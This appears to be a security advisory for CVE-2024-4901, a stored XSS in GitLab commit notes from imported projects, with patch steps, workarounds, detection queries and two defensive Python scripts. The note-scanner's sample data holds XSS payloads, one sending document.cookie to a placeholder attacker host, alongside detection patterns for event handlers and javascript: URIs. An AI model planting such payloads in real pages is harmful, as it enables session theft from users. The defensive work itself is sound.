CVE-2024-4901
📋 TL;DR
A stored cross-site scripting (XSS) vulnerability in GitLab lets an attacker plant malicious JavaScript in the commit notes of a project export; once that project is imported, the script executes in the browser of any user who views the affected commit. It affects GitLab Community Edition and Enterprise Edition on vulnerable versions (fixed in 16.11.5, 17.0.3 and 17.1.1). A payload that runs acts with the viewing user's session, so it can read anything that user can read, perform actions as them through the web UI and API, exfiltrate data, or redirect them to attacker-controlled sites.
💻 Affected Systems
- GitLab Community Edition
- GitLab Enterprise Edition
📦 What is this software?
Gitlab by Gitlab
GitLab is a complete DevOps platform providing source code management, CI/CD pipelines, security scanning, container registry, and collaboration tools used by millions of developers and thousands of enterprises worldwide. As both a cloud-hosted SaaS offering (GitLab.com) and self-managed software, G...
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator session cookies, gain full control of the GitLab instance, access source code, modify repositories, or deploy malicious code to production environments.
Likely Case
Attackers steal user session cookies to impersonate victims, access private repositories, or modify project settings and content.
If Mitigated
Only the vendor patch removes the injection. Restricting who may create or import projects limits who can plant a payload, and a Content Security Policy can stop some payloads from executing, but only if script-src excludes 'unsafe-inline'. Even with those controls, a payload that does run is confined to the viewing user's session and permissions; there is no privilege escalation beyond that user, which is why the damage scales with who views the commit.
🎯 Exploit Status
Exploitation requires an account on the target instance that can create or import a project. The attacker crafts a project export whose commit notes carry the payload, imports it, and then needs victims (ideally administrators) to view the affected commit; luring them there, for example with a link to the commit page, is where social engineering or a compromised account comes in. No user interaction beyond viewing the commit is required.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 16.11.5, 17.0.3, 17.1.1
Vendor Advisory: https://about.gitlab.com/releases/2024/06/26/security-release-gitlab-16-11-5-released/
Restart Required: Yes
Instructions:
1. Back up your GitLab instance (sudo gitlab-backup create on Omnibus installs).
2. Update to GitLab 16.11.5, 17.0.3, or 17.1.1 using your package manager, staying on your current minor branch where a fixed release exists. If you are more than one minor version behind, follow GitLab's documented upgrade path rather than jumping directly to the target release.
3. Run sudo gitlab-ctl reconfigure.
4. Run sudo gitlab-ctl restart.
5. Confirm the running version (see How to Verify below).
🔧 Temporary Workarounds
Disable project imports
Temporarily disable all project import sources so that no new export archives carrying malicious commit notes can be brought in. This blocks legitimate imports as well, and it does not remove payloads that were imported before the change; those notes stay in the database until someone finds and deletes them.
sudo gitlab-rails runner "ApplicationSetting.current.update!(import_sources: [])"
Enable Content Security Policy
Add a Content-Security-Policy header to limit what an injected script can do. Note that the example below keeps 'unsafe-inline' and 'unsafe-eval' in script-src, which still allows injected inline script to execute, so it does little against this particular vulnerability and should be treated as defense in depth rather than a fix. GitLab also exposes its own CSP configuration under gitlab_rails['content_security_policy'] in /etc/gitlab/gitlab.rb, which is the supported place to tighten the policy; test any stricter policy in report-only mode first, because parts of GitLab's UI may break under a script-src without 'unsafe-inline'.
Add to /etc/gitlab/gitlab.rb: nginx['custom_gitlab_server_config'] = "add_header Content-Security-Policy \"default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval';\";"
sudo gitlab-ctl reconfigure
🧯 If You Can't Patch
- Restrict the ability to create and import projects to trusted administrators only, for example by limiting project creation at the instance level and disabling import sources you do not use; an attacker needs that capability to plant the payload in the first place.
- Web application firewall rules are of limited value here: the payload arrives inside a compressed project export archive or via an import job, not as a plain form field, so request-inspecting rules will rarely see it. If you deploy them anyway, treat them as a last line of defense on the note-creation endpoints, not as protection against the import path.
🔍 How to Verify
Check if Vulnerable:
Read the running version:
sudo gitlab-rake gitlab:env:info | grep -i version
On Omnibus installs the same value is in /opt/gitlab/embedded/service/gitlab-rails/VERSION, and GET /api/v4/version returns it for an authenticated API user.
Verify Fix Applied:
Compare within the release branch rather than as a single "or higher" check: 16.11.x is fixed at 16.11.5, 17.0.x at 17.0.3, 17.1.x at 17.1.1, and 17.2 and later shipped after the fix. A 17.0.2 instance is still vulnerable even though 17.0.2 is numerically above 16.11.5. Branches older than 16.11 have no patched release; upgrade them to one of the fixed versions.
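The branch-by-branch comparison is easy to get wrong by hand, so here is an added example (not from the original page and not GitLab's own tooling) that pulls the version out of gitlab:env:info-style output and classifies it against the three patched releases. The sample output is constructed, and the function names are my own.

```python
import re

# Patched releases from the vendor advisory, keyed by release branch (major, minor).
PATCHED = {
    (16, 11): (16, 11, 5),
    (17, 0): (17, 0, 3),
    (17, 1): (17, 1, 1),
}

# Constructed sample of the relevant part of `gitlab-rake gitlab:env:info` output.
SAMPLE_ENV_INFO = """GitLab information
Version:\t17.0.2-ee
"""


def parse_version(text: str):
    """Return (major, minor, patch) from a string such as '17.0.2-ee' or 'Version: 16.11.4'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no x.y.z version found in {text!r}")
    return tuple(int(x) for x in m.groups())


def version_from_env_info(output: str):
    """Pick the first line mentioning 'version' (any case) and parse it."""
    for line in output.splitlines():
        if "version" in line.lower():
            return parse_version(line)
    raise ValueError("no version line in env:info output")


def assess(version: str) -> str:
    """Classify a version against the CVE-2024-4901 fixes, branch by branch.

    'vulnerable' - on a branch that has a fix, but below it (17.0.2 is vulnerable
                   even though it is numerically above 16.11.5)
    'patched'    - at or above the branch fix, or on a branch released after the fixes
    'upgrade'    - older branch with no patched release; move to a fixed branch
    """
    major, minor, patch = parse_version(version)
    branch = (major, minor)
    if branch in PATCHED:
        return "patched" if (major, minor, patch) >= PATCHED[branch] else "vulnerable"
    if branch > max(PATCHED):
        return "patched"
    return "upgrade"


if __name__ == "__main__":
    running = ".".join(map(str, version_from_env_info(SAMPLE_ENV_INFO)))
    print(running, "->", assess(running))
    for candidate in ("16.11.4", "16.11.5", "17.0.3", "17.1.0", "17.1.1", "17.2.0", "16.10.3"):
        print(candidate, "->", assess(candidate))
```

Pipe the real command into it instead of the sample (for example, `gitlab-rake gitlab:env:info | python3 check.py` with a small stdin wrapper) and treat anything other than "patched" as requiring an upgrade.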
📡 Detection & Monitoring
Log Indicators:
- Project imports (file upload or external source) by accounts that do not normally import, especially shortly before other users start visiting commits in the newly created project
- Repeated failed or retried import attempts from a single account
- Commit notes whose bodies contain HTML tags, event-handler attributes (onerror=, onload=) or javascript: URIs. GitLab's audit log records actions, not note bodies, so search the note bodies themselves (the notes table) rather than audit events.
Network Indicators:
- CSP violation reports or proxy logs showing users' browsers fetching scripts from hosts outside your allow-list right after loading a /-/commit/ page
- Outbound requests from user browsers to unknown hosts that carry session-like data in the URL or body
SIEM Query:
source="gitlab" ("project import" OR "commit note") AND ("script" OR "javascript" OR "onload" OR "onerror")
This matches ordinary words ("script", "onload") in everyday developer notes, so expect false positives; where your SIEM supports substring or regex matching, tighten the terms to tag-like forms such as "<script", "onerror=" and "javascript:".
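To make the "suspicious commit note patterns" indicator concrete, here is an added example (not GitLab's code and not from the original page) that applies tag-aware patterns to note bodies instead of bare keywords, so that prose mentioning "script" or "onload" is not flagged while `<svg/onload=` style payloads are. The note bodies are constructed samples, and the pattern names and the attacker.example host are my own.

```python
import re

# Tag-aware patterns: each one requires HTML or URI syntax, not just a keyword.
INJECTION_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    # an on...= attribute inside a tag; [\s/] also catches <svg/onload= payloads
    "event_handler": re.compile(r"<[^>]*[\s/]on[a-z]+\s*=", re.I),
    "javascript_uri": re.compile(r"""(href|src)\s*=\s*["']?\s*javascript:""", re.I),
    "active_element": re.compile(r"<\s*(iframe|object|embed|svg|math)\b", re.I),
}


def flag_note(body: str) -> list:
    """Names of the patterns that match one note body (empty list = nothing suspicious)."""
    return [name for name, pat in INJECTION_PATTERNS.items() if pat.search(body)]


def scan_notes(notes):
    """Map note id -> matched pattern names for every (id, body) pair that matches."""
    results = {}
    for note_id, body in notes:
        hits = flag_note(body)
        if hits:
            results[note_id] = hits
    return results


# Constructed sample notes; attacker.example is a placeholder host.
SAMPLE_NOTES = [
    (1, "Updated the build script and fixed the onload timing issue"),   # benign prose with keywords
    (2, "LGTM, see [docs](https://example.com/docs) for the rationale"),  # benign markdown
    (3, '<img src=x onerror="fetch(\'https://attacker.example/c?\'+document.cookie)">'),
    (4, '<a href="javascript:alert(1)">click</a>'),
    (5, "<svg/onload=alert(document.domain)>"),
]


if __name__ == "__main__":
    for note_id, hits in scan_notes(SAMPLE_NOTES).items():
        print(f"note {note_id}: {', '.join(hits)}")
```

In GitLab's schema commit notes are rows of the notes table with noteable_type = 'Commit', so you can export (id, note) pairs with gitlab-psql or gitlab-rails runner and feed them to scan_notes(). Review hits by hand: a note that legitimately quotes HTML in a code block will match too, and the patterns are a triage aid, not proof of exploitation.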